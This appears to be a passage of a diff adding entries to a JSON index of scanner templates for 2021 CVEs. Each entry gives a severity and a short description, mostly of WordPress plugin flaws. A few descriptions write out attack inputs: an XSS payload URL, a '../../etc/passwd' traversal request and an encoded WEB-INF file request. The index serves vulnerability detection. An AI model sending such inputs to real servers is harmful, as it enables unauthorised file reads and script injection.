+{"ID":"CVE-2021-24370","Info":{"Name":"WordPress Fancy Product Designer \u003c4.6.9 - Arbitrary File Upload","Severity":"critical","Description":"WordPress Fancy Product Designer plugin before 4.6.9 is susceptible to an arbitrary file upload. An attacker can upload malicious files and execute code on the server, modify data, and/or gain full control over a compromised system without authentication.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2021/CVE-2021-24370.yaml"} +{"ID":"CVE-2021-24387","Info":{"Name":"WordPress Pro Real Estate 7 Theme \u003c3.1.1 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Pro Real Estate 7 theme before 3.1.1 contains a reflected cross-site scripting vulnerability. It does not properly sanitize the ct_community parameter in its search listing page before outputting it back.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2021/CVE-2021-24387.yaml"} +{"ID":"CVE-2021-24389","Info":{"Name":"WordPress FoodBakery \u003c2.2 - Cross-Site Scripting","Severity":"medium","Description":"WordPress FoodBakery before 2.2 contains an unauthenticated reflected cross-site scripting vulnerability. It does not properly sanitize the foodbakery_radius parameter before outputting it back in the response.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2021/CVE-2021-24389.yaml"} +{"ID":"CVE-2021-24406","Info":{"Name":"WordPress wpForo Forum \u003c 1.9.7 - Open Redirect","Severity":"medium","Description":"WordPress wpForo Forum \u003c 1.9.7 is susceptible to an open redirect vulnerability because the plugin did not validate the redirect_to parameter in the login form of the forum, leading to an open redirect issue after a successful login.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2021/CVE-2021-24406.yaml"} +{"ID":"CVE-2021-24407","Info":{"Name":"WordPress Jannah Theme \u003c5.4.5 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Jannah theme before 5.4.5 contains a reflected cross-site scripting vulnerability. It does not properly sanitize the 'query' POST parameter in its tie_ajax_search AJAX action.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2021/CVE-2021-24407.yaml"} +{"ID":"CVE-2021-24472","Info":{"Name":"Onair2 \u003c 3.9.9.2 \u0026 KenthaRadio \u003c 2.0.2 - Remote File Inclusion/Server-Side Request Forgery","Severity":"critical","Description":"Onair2 \u003c 3.9.9.2 and KenthaRadio \u003c 2.0.2 have exposed proxy functionality to unauthenticated users. Sending requests to this proxy functionality will have the web server fetch and display the content from any URI, allowing remote file inclusion and server-side request forgery.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2021/CVE-2021-24472.yaml"} +{"ID":"CVE-2021-24488","Info":{"Name":"WordPress Post Grid \u003c2.1.8 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Post Grid plugin before 2.1.8 contains a reflected cross-site scripting vulnerability. The slider import search feature and tab parameter of thesettings are not properly sanitized before being output back in the pages,","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2021/CVE-2021-24488.yaml"} +{"ID":"CVE-2021-24495","Info":{"Name":"Wordpress Marmoset Viewer \u003c1.9.3 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Marmoset Viewer plugin before 1.9.3 contains a cross-site scripting vulnerability. It does not property sanitize, validate, or escape the 'id' parameter before outputting back in the page.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2021/CVE-2021-24495.yaml"} +{"ID":"CVE-2021-24498","Info":{"Name":"WordPress Calendar Event Multi View \u003c1.4.01 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Calendar Event Multi View plugin before 1.4.01 contains an unauthenticated reflected cross-site scripting vulnerability. It does not sanitize or escape the 'start' and 'end' GET parameters before outputting them in the page (via php/edit.php).","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2021/CVE-2021-24498.yaml"} +{"ID":"CVE-2021-24499","Info":{"Name":"WordPress Workreap - Remote Code Execution","Severity":"critical","Description":"WordPress Workreap theme is susceptible to remote code execution. The AJAX actions workreap_award_temp_file_uploader and workreap_temp_file_uploader did not perform nonce checks, or validate that the request is from a valid user in any other way. The endpoints allowed for uploading arbitrary files to the uploads/workreap-temp directory. Uploaded files were neither sanitized nor validated, allowing an unauthenticated visitor to upload executable code such as php scripts.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2021/CVE-2021-24499.yaml"} +{"ID":"CVE-2021-24510","Info":{"Name":"WordPress MF Gig Calendar \u003c=1.1 - Cross-Site Scripting","Severity":"medium","Description":"WordPress MF Gig Calendar plugin 1.1 and prior contains a reflected cross-site scripting vulnerability. It does not sanitize or escape the id GET parameter before outputting back in the admin dashboard when editing an event.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2021/CVE-2021-24510.yaml"} +{"ID":"CVE-2021-24746","Info":{"Name":"WordPress Sassy Social Share Plugin \u003c3.3.40 - Cross-Site Scripting","Severity":"medium","Description":"WordPress plugin Sassy Social Share \u003c 3.3.40 contains a reflected cross-site scripting vulnerability.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2021/CVE-2021-24746.yaml"} +{"ID":"CVE-2021-24750","Info":{"Name":"WordPress Visitor Statistics (Real Time Traffic) \u003c4.8 -SQL Injection","Severity":"high","Description":"WordPress Visitor Statistics (Real Time Traffic) plugin before 4.8 does not properly sanitize and escape the refUrl in the refDetails AJAX action, which is available to any authenticated user. This could allow users with a role as low as subscriber to perform SQL injection attacks.","Classification":{"CVSSScore":"8.8"}},"file_path":"cves/2021/CVE-2021-24750.yaml"} +{"ID":"CVE-2021-24762","Info":{"Name":"WordPress Perfect Survey\u003c1.5.2 - SQL Injection","Severity":"critical","Description":"Perfect Survey WordPress plugin before 1.5.2 does not validate and escape the question_id GET parameter before using it in a SQL statement in the get_question AJAX action, allowing unauthenticated users to perform SQL injection.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2021/CVE-2021-24762.yaml"} +{"ID":"CVE-2021-24827","Info":{"Name":"Asgaros Forum \u003c 1.15.13 - Unauthenticated SQL Injection","Severity":"critical","Description":"The Asgaros Forum WordPress plugin before 1.15.13 does not validate and escape user input when subscribing to a topic before using it in a SQL statement, leading to an unauthenticated SQL injection issue.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2021/CVE-2021-24827.yaml"} +{"ID":"CVE-2021-24838","Info":{"Name":"WordPress AnyComment \u003c0.3.5 - Open Redirect","Severity":"medium","Description":"WordPress AnyComment plugin before 0.3.5 contains an open redirect vulnerability via an API endpoint which passes user input via the redirect parameter to the wp_redirect() function without being validated. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2021/CVE-2021-24838.yaml"} +{"ID":"CVE-2021-24891","Info":{"Name":"WordPress Elementor Website Builder \u003c3.1.4 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Elementor Website Builder plugin before 3.1.4 contains a DOM cross-site scripting vulnerability. It does not sanitize or escape user input appended to the DOM via a malicious hash.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2021/CVE-2021-24891.yaml"} +{"ID":"CVE-2021-24910","Info":{"Name":"WordPress Transposh Translation \u003c1.0.8 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Transposh Translation plugin before 1.0.8 contains a reflected cross-site scripting vulnerability. It does not sanitize and escape the a parameter via an AJAX action (available to both unauthenticated and authenticated users when the curl library is installed) before outputting it back in the response.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2021/CVE-2021-24910.yaml"} +{"ID":"CVE-2021-24917","Info":{"Name":"WPS Hide Login \u003c 1.9.1 - Protection Bypass with Referer-Header","Severity":"high","Description":"The plugin has a bug which allows to get the secret login page by setting a random referer string and making a request to /wp-admin/options.php as an unauthenticated user.","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2021/CVE-2021-24917.yaml"} +{"ID":"CVE-2021-24926","Info":{"Name":"WordPress Domain Check \u003c1.0.17 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Domain Check plugin before 1.0.17 contains a reflected cross-site scripting vulnerability. It does not sanitize and escape the domain parameter before outputting it back in the page.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2021/CVE-2021-24926.yaml"} +{"ID":"CVE-2021-24940","Info":{"Name":"WordPress Persian Woocommerce \u003c=5.8.0 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Persian Woocommerce plugin through 5.8.0 contains a cross-site scripting vulnerability. The plugin does not escape the s parameter before outputting it back in an attribute in the admin dashboard. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site and possibly steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2021/CVE-2021-24940.yaml"} +{"ID":"CVE-2021-24946","Info":{"Name":"Modern Events Calendar \u003c 6.1.5 - Blind SQL Injection","Severity":"critical","Description":"The plugin does not sanitise and escape the time parameter before using it in a SQL statement in the mec_load_single_page AJAX action, available to unauthenticated users, leading to an unauthenticated SQL injection issue.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2021/CVE-2021-24946.yaml"} +{"ID":"CVE-2021-24947","Info":{"Name":"WordPress Responsive Vector Maps \u003c 6.4.2 - Arbitrary File Read","Severity":"medium","Description":"WordPress Responsive Vector Maps \u003c 6.4.2 contains an arbitrary file read vulnerability because the plugin does not have proper authorization and validation of the rvm_upload_regions_file_path parameter in the rvm_import_regions AJAX action, allowing any authenticated user to read arbitrary files on the web server.","Classification":{"CVSSScore":"6.5"}},"file_path":"cves/2021/CVE-2021-24947.yaml"} +{"ID":"CVE-2021-24987","Info":{"Name":"WordPress Super Socializer \u003c7.13.30 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Super Socializer plugin before 7.13.30 contains a reflected cross-site scripting vulnerability. It does not sanitize and escape the urls parameter in its the_champ_sharing_count AJAX action (available to both unauthenticated and authenticated users) before outputting it back in the response.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2021/CVE-2021-24987.yaml"} +{"ID":"CVE-2021-24991","Info":{"Name":"WooCommerce PDF Invoices \u0026 Packing Slips WordPress Plugin \u003c 2.10.5 - Cross-Site Scripting","Severity":"medium","Description":"The Wordpress plugin WooCommerce PDF Invoices \u0026 Packing Slips before 2.10.5 does not escape the tab and section parameters before reflecting it an attribute, leading to a reflected cross-site scripting in the admin dashboard.","Classification":{"CVSSScore":"4.8"}},"file_path":"cves/2021/CVE-2021-24991.yaml"} +{"ID":"CVE-2021-24997","Info":{"Name":"Wordpress Guppy \u003c=1.1 - User ID Disclosure","Severity":"medium","Description":"Instances of the Guppy Wordpress extension up to 1.1 are vulnerable to an API disclosure vulnerability which allows remote unauthenticated attackrs to obtain all user IDs, and then use that information to make API requests to either get messages sent between users, or send messages posing as one user to another.","Classification":{"CVSSScore":"6.5"}},"file_path":"cves/2021/CVE-2021-24997.yaml"} +{"ID":"CVE-2021-25003","Info":{"Name":"WPCargo \u003c 6.9.0 - Unauthenticated Remote Code Execution","Severity":"critical","Description":"The WPCargo Track \u0026 Trace WordPress plugin before 6.9.0 contains a file which could allow unauthenticated attackers to write a PHP file anywhere on the web server, leading to RCE.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2021/CVE-2021-25003.yaml"} +{"ID":"CVE-2021-25008","Info":{"Name":"The Code Snippets WordPress Plugin \u003c 2.14.3 - Cross-Site Scripting","Severity":"medium","Description":"The Wordpress plugin Code Snippets before 2.14.3 does not escape the snippets-safe-mode parameter before reflecting it in attributes, leading to a reflected cross-site scripting issue.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2021/CVE-2021-25008.yaml"} +{"ID":"CVE-2021-25028","Info":{"Name":"WordPress Event Tickets \u003c 5.2.2 - Open Redirect","Severity":"medium","Description":"WordPress Event Tickets \u003c 5.2.2 is susceptible to an open redirect vulnerability. The plugin does not validate the tribe_tickets_redirect_to parameter before redirecting the user to the given value, leading to an arbitrary redirect issue.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2021/CVE-2021-25028.yaml"} +{"ID":"CVE-2021-25033","Info":{"Name":"Noptin \u003c 1.6.5 - Open Redirect","Severity":"medium","Description":"Noptin \u003c 1.6.5 is susceptible to an open redirect vulnerability. The plugin does not validate the \"to\" parameter before redirecting the user to its given value, leading to an open redirect issue.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2021/CVE-2021-25033.yaml"} +{"ID":"CVE-2021-25052","Info":{"Name":"WordPress Button Generator \u003c2.3.3 - Remote File Inclusion","Severity":"high","Description":"WordPress Button Generator before 2.3.3 within the wow-company admin menu page allows arbitrary file inclusion with PHP extensions (as well as with data:// or http:// protocols), thus leading to cross-site request forgery and remote code execution.","Classification":{"CVSSScore":"8.8"}},"file_path":"cves/2021/CVE-2021-25052.yaml"} +{"ID":"CVE-2021-25055","Info":{"Name":"WordPress FeedWordPress \u003c 2022.0123 - Authenticated Cross-Site Scripting","Severity":"medium","Description":"The plugin is affected by a cross-site scripting vulnerability within the \"visibility\" parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2021/CVE-2021-25055.yaml"} +{"ID":"CVE-2021-25063","Info":{"Name":"WordPress Contact Form 7 Skins \u003c=2.5.0 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Contact Form 7 Skins plugin 2.5.0 and prior contains a reflected cross-site scripting vulnerability. It does not sanitize and escape the tab parameter before outputting it back in an admin page.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2021/CVE-2021-25063.yaml"} +{"ID":"CVE-2021-25074","Info":{"Name":"WordPress WebP Converter for Media \u003c 4.0.3 - Unauthenticated Open Redirect","Severity":"medium","Description":"WordPress WebP Converter for Media \u003c 4.0.3 contains a file (passthru.php) which does not validate the src parameter before redirecting the user to it, leading to an open redirect issue.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2021/CVE-2021-25074.yaml"} +{"ID":"CVE-2021-25075","Info":{"Name":"WordPress Duplicate Page or Post \u003c1.5.1 - Cross-Site Scripting","Severity":"low","Description":"WordPress Duplicate Page or Post plugin before 1.5.1 contains a stored cross-site scripting vulnerability. The plugin does not have any authorization and has a flawed cross-site request forgery check in the wpdevart_duplicate_post_parametrs_save_in_db AJAX action, allowing unauthenticated users to call it and change the plugin's settings, or perform such attack via cross-site request forgery.\n","Classification":{"CVSSScore":"3.5"}},"file_path":"cves/2021/CVE-2021-25075.yaml"} +{"ID":"CVE-2021-25085","Info":{"Name":"WOOF WordPress plugin - Cross-Site Scripting","Severity":"medium","Description":"The WOOF WordPress plugin does not sanitize or escape the woof_redraw_elements parameter before reflecting it back in an admin page, leading to a reflected cross-site scripting.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2021/CVE-2021-25085.yaml"} +{"ID":"CVE-2021-25099","Info":{"Name":"Give \u003c 2.17.3 - Cross-Site Scripting","Severity":"medium","Description":"The GiveWP WordPress plugin before 2.17.3 does not sanitise and escape the form_id parameter before outputting it back in the response of an unauthenticated request via the give_checkout_login AJAX action, leading to a Reflected Cross-Site Scripting.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2021/CVE-2021-25099.yaml"} +{"ID":"CVE-2021-25104","Info":{"Name":"WordPress Ocean Extra \u003c1.9.5 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Ocean Extra plugin before 1.9.5 contains a cross-site scripting vulnerability. The plugin does not escape generated links which are then used when the OceanWP theme is active.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2021/CVE-2021-25104.yaml"} +{"ID":"CVE-2021-25111","Info":{"Name":"WordPress English Admin \u003c1.5.2 - Open Redirect","Severity":"medium","Description":"WordPress English Admin plugin before 1.5.2 contains an open redirect vulnerability. The plugin does not validate the admin_custom_language_return_url before redirecting users to it. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized operations.","Classification":{"CVSSScore":"6.10"}},"file_path":"cves/2021/CVE-2021-25111.yaml"} +{"ID":"CVE-2021-25112","Info":{"Name":"WordPress WHMCS Bridge \u003c6.4b - Cross-Site Scripting","Severity":"medium","Description":"WordPress WHMCS Bridge plugin before 6.4b contains a reflected cross-site scripting vulnerability. It does not sanitize and escape the error parameter before outputting it back in the admin dashboard.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2021/CVE-2021-25112.yaml"} +{"ID":"CVE-2021-25118","Info":{"Name":"Yoast SEO \u003c 17.3 - Path Disclosure","Severity":"medium","Description":"The plugin discloses the full internal path of featured images in posts via the wp/v2/posts REST endpoints which could help an attacker identify other vulnerabilities or help during the exploitation of other identified vulnerabilities.","Classification":{"CVSSScore":"5.3"}},"file_path":"cves/2021/CVE-2021-25118.yaml"} +{"ID":"CVE-2021-25120","Info":{"Name":"Easy Social Feed \u003c 6.2.7 - Cross-Site Scripting","Severity":"medium","Description":"Easy Social Feed \u003c 6.2.7 is susceptible to reflected cross-site scripting because the plugin does not sanitize and escape a parameter before outputting it back in an admin dashboard page, leading to it being executed in the context of a logged admin or editor.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2021/CVE-2021-25120.yaml"} +{"ID":"CVE-2021-25281","Info":{"Name":"SaltStack Salt \u003c3002.5 - Auth Bypass","Severity":"critical","Description":"SaltStack Salt before 3002.5 does not honor eauth credentials for the wheel_async client, allowing attackers to remotely run any wheel modules on the master.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2021/CVE-2021-25281.yaml"} +{"ID":"CVE-2021-25646","Info":{"Name":"Apache Druid - Remote Code Execution","Severity":"high","Description":"Apache Druid is susceptible to remote code execution because by default it lacks authorization and authentication. Attackers can send specially crafted requests to execute arbitrary code with the privileges of processes on the Druid server.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"cves/2021/CVE-2021-25646.yaml"} +{"ID":"CVE-2021-25864","Info":{"Name":"Hue Magic 3.0.0 - Local File Inclusion","Severity":"high","Description":"Hue Magic 3.0.0 is susceptible to local file inclusion via the res.sendFile API.","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2021/CVE-2021-25864.yaml"} +{"ID":"CVE-2021-26084","Info":{"Name":"Confluence Server - Remote Code Execution","Severity":"critical","Description":"Confluence Server and Data Center contain an OGNL injection vulnerability that could allow an authenticated user, and in some instances an unauthenticated user, to execute arbitrary code on a Confluence Server or Data Center instance. The affected versions are before version 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from version 7.12.0 before 7.12.5. The vulnerable endpoints can be accessed by a non-administrator user or unauthenticated user if 'Allow people to sign up to create their account' is enabled. To check whether this is enabled go to COG \u003e User Management \u003e User Signup Options.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2021/CVE-2021-26084.yaml"} +{"ID":"CVE-2021-26085","Info":{"Name":"Atlassian Confluence Server - Local File Inclusion","Severity":"medium","Description":"Atlassian Confluence Server allows remote attackers to view restricted resources via local file inclusion in the /s/ endpoint.","Classification":{"CVSSScore":"5.3"}},"file_path":"cves/2021/CVE-2021-26085.yaml"} +{"ID":"CVE-2021-26086","Info":{"Name":"Atlassian Jira Limited - Local File Inclusion","Severity":"medium","Description":"Affected versions of Atlassian Jira Limited Server and Data Center are vulnerable to local file inclusion because they allow remote attackers to read particular files via a path traversal vulnerability in the /WEB-INF/web.xml endpoint.","Classification":{"CVSSScore":"5.3"}},"file_path":"cves/2021/CVE-2021-26086.yaml"} +{"ID":"CVE-2021-26247","Info":{"Name":"Cacti - Cross-Site Scripting","Severity":"medium","Description":"Cacti contains a cross-site scripting vulnerability via \"http://\u003cCACTI_SERVER\u003e/auth_changepassword.php?ref=\u003cscript\u003ealert(1)\u003c/script\u003e\" which can successfully execute the JavaScript payload present in the \"ref\" URL parameter.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2021/CVE-2021-26247.yaml"} +{"ID":"CVE-2021-26295","Info":{"Name":"Apache OFBiz \u003c17.12.06 - Arbitrary Code Execution","Severity":"critical","Description":"Apache OFBiz has unsafe deserialization prior to 17.12.06. An unauthenticated attacker can use this vulnerability to successfully take over Apache OFBiz.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2021/CVE-2021-26295.yaml"} +{"ID":"CVE-2021-26475","Info":{"Name":"EPrints 3.4.2 - Cross-Site Scripting","Severity":"medium","Description":"EPrints 3.4.2 contains a reflected cross-site scripting vulnerability via the cgi/cal URI.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2021/CVE-2021-26475.yaml"} +{"ID":"CVE-2021-26598","Info":{"Name":"ImpressCMS - Incorrect Authorization","Severity":"medium","Description":"ImpressCMS before 1.4.3 has Incorrect Access Control because include/findusers.php allows access by unauthenticated attackers (who are, by design, able to have a security token).","Classification":{"CVSSScore":"5.3"}},"file_path":"cves/2021/CVE-2021-26598.yaml"} +{"ID":"CVE-2021-26702","Info":{"Name":"EPrints 3.4.2 - Cross-Site Scripting","Severity":"medium","Description":"EPrints 3.4.2 contains a reflected cross-site scripting vulnerability in the dataset parameter to the cgi/dataset_ dictionary URI.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2021/CVE-2021-26702.yaml"} +{"ID":"CVE-2021-26710","Info":{"Name":"Redwood Report2Web 4.3.4.5 \u0026 4.5.3 - Cross-Site Scripting","Severity":"medium","Description":"Redwood Report2Web 4.3.4.5 and 4.5.3 contains a cross-site scripting vulnerability in the login panel which allows remote attackers to inject JavaScript via the signIn.do urll parameter.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2021/CVE-2021-26710.yaml"} +{"ID":"CVE-2021-26723","Info":{"Name":"Jenzabar 9.2x-9.2.2 - Cross-Site Scripting","Severity":"medium","Description":"Jenzabar 9.2.x through 9.2.2 contains a cross-site scripting vulnerability. It allows /ics?tool=search\u0026query.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2021/CVE-2021-26723.yaml"} +{"ID":"CVE-2021-26812","Info":{"Name":"Moodle Jitsi Meet 2.7-2.8.3 - Cross-Site Scripting","Severity":"medium","Description":"Moodle Jitsi Meet 2.7 through 2.8.3 plugin contains a cross-site scripting vulnerability via the \"sessionpriv.php\" module. This allows attackers to craft a malicious URL, which when clicked on by users, can inject JavaScript code to be run by the application.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2021/CVE-2021-26812.yaml"} +{"ID":"CVE-2021-26855","Info":{"Name":"Microsoft Exchange Server SSRF Vulnerability","Severity":"critical","Description":"This vulnerability is part of an attack chain that could allow remote code execution on Microsoft Exchange Server. The initial attack requires the ability to make an untrusted connection to Exchange server port 443. Other portions of the chain can be triggered if an attacker already has access or can convince an administrator to open a malicious file. Be aware his CVE ID is unique from CVE-2021-26412, CVE-2021-26854, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065, and CVE-2021-27078.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2021/CVE-2021-26855.yaml"} +{"ID":"CVE-2021-27132","Info":{"Name":"Sercomm VD625 Smart Modems - CRLF Injection","Severity":"critical","Description":"Sercomm AGCOMBO VD625 Smart Modems with firmware version AGSOT_2.1.0 are vulnerable to Carriage Return Line Feed (CRLF) injection via the Content-Disposition header.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2021/CVE-2021-27132.yaml"} +{"ID":"CVE-2021-27309","Info":{"Name":"Clansphere CMS 2011.4 - Cross-Site Scripting","Severity":"medium","Description":"Clansphere CMS 2011.4 contains an unauthenticated reflected cross-site scripting vulnerability via the \"module\" parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2021/CVE-2021-27309.yaml"} +{"ID":"CVE-2021-27310","Info":{"Name":"Clansphere CMS 2011.4 - Cross-Site Scripting","Severity":"medium","Description":"Clansphere CMS 2011.4 contains an unauthenticated reflected cross-site scripting vulnerability via the \"language\" parameter.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2021/CVE-2021-27310.yaml"} +{"ID":"CVE-2021-27330","Info":{"Name":"Triconsole Datepicker Calendar \u003c3.77 - Cross-Site Scripting","Severity":"medium","Description":"Triconsole Datepicker Calendar before 3.77 contains a cross-site scripting vulnerability in calendar_form.php. Attackers can read authentication cookies that are still active, which can be used to perform further attacks such as reading browser history, directory listings, and file contents.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2021/CVE-2021-27330.yaml"} +{"ID":"CVE-2021-27358","Info":{"Name":"Grafana Unauthenticated Snapshot Creation","Severity":"high","Description":"Grafana 6.7.3 through 7.4.1 snapshot functionality can allow an unauthenticated remote attacker to trigger a Denial of Service via a remote API call if a commonly used configuration is set.","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2021/CVE-2021-27358.yaml"} +{"ID":"CVE-2021-27519","Info":{"Name":"FUDForum 3.1.0 - Cross-Site Scripting","Severity":"medium","Description":"FUDForum 3.1.0 contains a cross-site scripting vulnerability which allows remote attackers to inject JavaScript via index.php in the \"srch\" parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2021/CVE-2021-27519.yaml"} +{"ID":"CVE-2021-27561","Info":{"Name":"YeaLink DM 3.6.0.20 - Remote Command Injection","Severity":"critical","Description":"Yealink Device Management (DM) 3.6.0.20 allows command injection as root via the /sm/api/v1/firewall/zone/services URI, without authentication.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2021/CVE-2021-27561.yaml"} +{"ID":"CVE-2021-27651","Info":{"Name":"Pega Infinity - Authentication Bypass","Severity":"critical","Description":"Pega Infinity versions 8.2.1 through 8.5.2 contain an authentication bypass vulnerability because the password reset functionality for local accounts can be used to bypass local authentication checks.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2021/CVE-2021-27651.yaml"} +{"ID":"CVE-2021-27748","Info":{"Name":"IBM WebSphere HCL Digital Experience - Server-Side Request Forgery","Severity":"high","Description":"IBM WebSphere HCL Digital Experience is vulnerable to server-side request forgery that impacts on-premise deployments and containers.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2021/CVE-2021-27748.yaml"} +{"ID":"CVE-2021-27850","Info":{"Name":"Apache Tapestry - Remote Code Execution","Severity":"critical","Description":"Apache Tapestry contains a critical unauthenticated remote code execution vulnerability. Affected versions include 5.4.5, 5.5.0, 5.6.2 and 5.7.0. Note that this vulnerability is a bypass of the fix for CVE-2019-0195. Before that fix it was possible to download arbitrary class files from the classpath by providing a crafted asset file URL.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2021/CVE-2021-27850.yaml"} +{"ID":"CVE-2021-27905","Info":{"Name":"Apache Solr \u003c=8.8.1 - Server-Side Request Forgery","Severity":"critical","Description":"Apache Solr versions 8.8.1 and prior contain a server-side request forgery vulnerability. The ReplicationHandler (normally registered at \"/replication\" under a Solr core) in Apache Solr has a \"masterUrl\" (also \"leaderUrl\" alias) parameter that is used to designate another ReplicationHandler on another Solr core to replicate index data into the local core. To prevent a SSRF vulnerability, Solr ought to check these parameters against a similar configuration it uses for the \"shards\" parameter.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2021/CVE-2021-27905.yaml"} +{"ID":"CVE-2021-27909","Info":{"Name":"Mautic \u003c3.3.4 - Cross-Site Scripting","Severity":"medium","Description":"Mautic before 3.3.4 contains a cross-site scripting vulnerability on the password reset page in the bundle parameter of the URL. An attacker can inject arbitrary script, steal cookie-based authentication credentials, and/or launch other attacks.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2021/CVE-2021-27909.yaml"} +{"ID":"CVE-2021-27931","Info":{"Name":"LumisXP \u003c10.0.0 - Blind XML External Entity Attack","Severity":"critical","Description":"LumisXP (aka Lumis Experience Platform) before 10.0.0 allows unauthenticated blind XML external entity (XXE) attacks via an API request to PageControllerXml.jsp. One can send a request crafted with an XXE payload and achieve outcomes such as reading local server files or denial of service.","Classification":{"CVSSScore":"9.1"}},"file_path":"cves/2021/CVE-2021-27931.yaml"} +{"ID":"CVE-2021-28073","Info":{"Name":"Ntopng Authentication Bypass","Severity":"critical","Description":"Ntopng, a passive network monitoring tool, contains an authentication bypass vulnerability in ntopng \u003c= 4.2","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2021/CVE-2021-28073.yaml"} +{"ID":"CVE-2021-28149","Info":{"Name":"Hongdian H8922 3.0.5 Devices - Local File Inclusion","Severity":"medium","Description":"Hongdian H8922 3.0.5 devices are vulnerable to local file inclusion. The /log_download.cgi log export handler does not validate user input and allows a remote attacker with minimal privileges to download any file from the device by substituting ../ (e.g., ../../etc/passwd) This can be carried out with a web browser by changing the file name accordingly. Upon visiting log_download.cgi?type=../../etc/passwd and logging in, the web server will allow a download of the contents of the /etc/passwd file.\n","Classification":{"CVSSScore":"6.5"}},"file_path":"cves/2021/CVE-2021-28149.yaml"} +{"ID":"CVE-2021-28150","Info":{"Name":"Hongdian Sensitive Information","Severity":"medium","Description":"Hongdian H8922 3.0.5 devices allow the unprivileged guest user to read cli.conf (with the administrator password and other sensitive data) via /backup2.cgi.","Classification":{"CVSSScore":"5.5"}},"file_path":"cves/2021/CVE-2021-28150.yaml"} +{"ID":"CVE-2021-28151","Info":{"Name":"Hongdian H8922 3.0.5 - Remote Command Injection","Severity":"high","Description":"Hongdian H8922 3.0.5 devices allow OS command injection via shell metacharacters into the ip-address (aka Destination) field to the tools.cgi ping command, which is accessible with the username guest and password guest.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"cves/2021/CVE-2021-28151.yaml"} +{"ID":"CVE-2021-28164","Info":{"Name":"Jetty Authorization Before Parsing and Canonicalization","Severity":"medium","Description":"The default compliance mode allows requests with URIs that contain %2e or %2e%2e segments to access protected resources within the WEB-INF directory. For example a request to /context/%2e/WEB-INF/web.xml can retrieve the web.xml file. This can reveal sensitive information regarding the implementation of a web application.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"cves/2021/CVE-2021-28164.yaml"} +{"ID":"CVE-2021-28169","Info":{"Name":"Jetty Utility Servlets Information Disclosure","Severity":"medium","Description":"For Eclipse Jetty versions 